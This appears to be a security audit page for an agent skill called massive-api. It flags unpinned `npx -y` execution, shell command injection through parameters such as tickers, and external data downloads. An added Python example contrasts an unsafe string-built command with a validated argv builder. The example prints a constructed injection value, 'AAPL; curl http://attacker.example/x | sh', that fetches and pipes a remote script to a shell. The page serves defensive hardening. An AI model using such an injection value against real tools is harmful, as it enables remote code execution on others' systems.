massive-api

Warn

Audited by Gen Agent Trust Hub on Mar 8, 2026

Risk Level: MEDIUM
Tags: REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The skill repeatedly invokes `npx -y massive-cli`, which has the agent download and execute code from the npm registry at run time.
  • Evidence: Found in SKILL.md and in every command reference file (e.g., references/stocks_commands.md).
  • Risk: The package reference is neither scoped nor pinned to a version, so each invocation resolves to whatever `massive-cli` currently is on the registry. A squatted name or a compromised registry entry would therefore run with the agent's privileges, and the `-y` flag suppresses the install confirmation that might otherwise give a human a chance to notice. Pinning an exact version (`massive-cli@<version>`) and verifying the tarball's integrity hash reduces this exposure.
  • [COMMAND_EXECUTION]: The skill constructs shell commands from multiple user-controlled parameters such as tickers, dates, and window sizes.
  • Evidence: The command structures in references/crypto_commands.md and references/forex_commands.md interpolate these options into the npx execution string.
  • Risk: If those values are spliced into a single shell string rather than passed as separate arguments, a value containing shell metacharacters (for example a ticker of the form `AAPL; <command>`) is parsed as an additional command. Validating each field against an allowlist and passing the arguments as an argv array, with no shell in between, removes that path.
  • [EXTERNAL_DOWNLOADS]: The skill fetches market data from the Massive (Polygon) API, an external network dependency whose availability and returned content are outside the skill's control.
  • Evidence: SKILL.md identifies the need for MASSIVE_API_KEY to access the remote financial endpoints.
  • [SAFE]: The requirement for MASSIVE_API_KEY is documented and follows standard practice for API-integrated tools, provided the key is supplied through the environment and is never written into SKILL.md, logs, or the constructed command strings.
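The following is an added illustration by the editor, not code from the massive-api skill or from the Trust Hub audit. It contrasts the flagged pattern (parameters spliced into one shell string) with a hardened builder that validates each field and produces an argv list for `npx`. The `stocks` subcommand, the `--ticker`/`--from`/`--to`/`--window` flags, the ticker grammar, the window bounds, and the `X.Y.Z` version placeholder are all assumptions chosen for the example; they are not taken from massive-cli's real interface.

```python
"""Added example: build a massive-cli invocation from agent-supplied
parameters without shell interpolation. Subcommand, flag names, and the
version placeholder are hypothetical, not massive-cli's real interface."""
import re
import shlex
import subprocess
from datetime import date

# Placeholder (assumption): pin to the exact version you have reviewed
# instead of letting `npx -y massive-cli` resolve "latest" at run time.
MASSIVE_CLI_SPEC = "massive-cli@X.Y.Z"

# Hypothetical allowlist for symbols; tighten it to the grammar the API
# actually accepts. Anything outside this set is rejected outright.
TICKER_RE = re.compile(r"^[A-Z0-9][A-Z0-9.\-:]{0,15}$")


def validate_ticker(ticker: str) -> str:
    if not TICKER_RE.fullmatch(ticker):
        raise ValueError(f"rejected ticker: {ticker!r}")
    return ticker


def validate_date(value: str) -> str:
    # fromisoformat raises ValueError for anything that is not a real
    # ISO calendar date, so shell metacharacters never get through.
    return date.fromisoformat(value).isoformat()


def validate_window(value) -> int:
    window = int(value)          # non-numeric input raises ValueError
    if not 1 <= window <= 365:   # assumed bound for the example
        raise ValueError(f"window out of range: {window}")
    return window


def build_command_unsafe(ticker, start, end, window) -> str:
    """The pattern the audit flags: every parameter is interpolated into
    one string that a shell will parse. A ticker such as
    'AAPL; curl http://attacker.example/x | sh' becomes a second command."""
    return (f"npx -y massive-cli stocks --ticker {ticker} "
            f"--from {start} --to {end} --window {window}")


def build_command(ticker, start, end, window) -> list[str]:
    """Hardened form: validate each field, pin the package, and return an
    argv list so that no shell ever tokenises the values."""
    return [
        "npx", "-y", MASSIVE_CLI_SPEC, "stocks",
        "--ticker", validate_ticker(ticker),
        "--from", validate_date(start),
        "--to", validate_date(end),
        "--window", str(validate_window(window)),
    ]


def run(argv: list[str]) -> subprocess.CompletedProcess:
    # shell=False (the default) hands argv straight to the new process;
    # each list element arrives as exactly one argument.
    return subprocess.run(argv, check=True, capture_output=True, text=True)


if __name__ == "__main__":
    payload = "AAPL; curl http://attacker.example/x | sh"   # constructed input
    print("unsafe:", build_command_unsafe(payload, "2026-01-01", "2026-03-01", 30))
    try:
        build_command(payload, "2026-01-01", "2026-03-01", 30)
    except ValueError as exc:
        print("blocked:", exc)
    # shlex.join quotes each element, which is the right way to display
    # an argv list in a log without re-introducing a shell.
    print("safe:", shlex.join(build_command("AAPL", "2026-01-01", "2026-03-01", 30)))
```

The `run` helper is never invoked with the constructed payload; the point is that the validated argv list reaches `npx` without passing through a shell, so even a value that slipped past the allowlist would be delivered as a single argument rather than executed.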
Audit Metadata
Risk Level
MEDIUM
Analyzed
Mar 8, 2026, 10:06 PM